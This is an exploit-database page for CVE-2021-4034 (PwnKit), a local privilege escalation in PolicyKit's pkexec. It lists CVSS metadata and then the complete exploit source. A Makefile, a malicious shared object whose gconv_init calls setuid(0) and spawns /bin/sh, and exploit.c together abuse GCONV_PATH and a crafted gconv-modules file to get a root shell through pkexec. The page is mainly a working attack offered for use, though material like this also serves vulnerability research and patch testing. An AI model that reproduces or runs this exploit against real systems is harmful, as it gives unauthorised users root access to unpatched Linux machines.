PolicyKit-1 0.105-31 Privilege Escalation

2022.01.27
Risk: High
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation # Exploit Author: Lance Biggerstaff # Original Author: ryaagard (https://github.com/ryaagard) # Date: 27-01-2022 # Github Repo: https://github.com/ryaagard/CVE-2021-4034 # References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt # Description: The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c` ##### Makefile ##### all: gcc -shared -o evil.so -fPIC evil-so.c gcc exploit.c -o exploit clean: rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so ################# ##### evil-so.c ##### #include <stdio.h> #include <stdlib.h> #include <unistd.h> void gconv() {} void gconv_init() { setuid(0); setgid(0); setgroups(0); execve("/bin/sh", NULL, NULL); } ################# ##### exploit.c ##### #include <stdio.h> #include <stdlib.h> #define BIN "/usr/bin/pkexec" #define DIR "evildir" #define EVILSO "evil" int main() { char *envp[] = { DIR, "PATH=GCONV_PATH=.", "SHELL=ryaagard", "CHARSET=ryaagard", NULL }; char *argv[] = { NULL }; system("mkdir GCONV_PATH=."); system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR); system("mkdir " DIR); system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules"); system("cp " EVILSO ".so " DIR); execve(BIN, argv, envp); return 0; } #################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top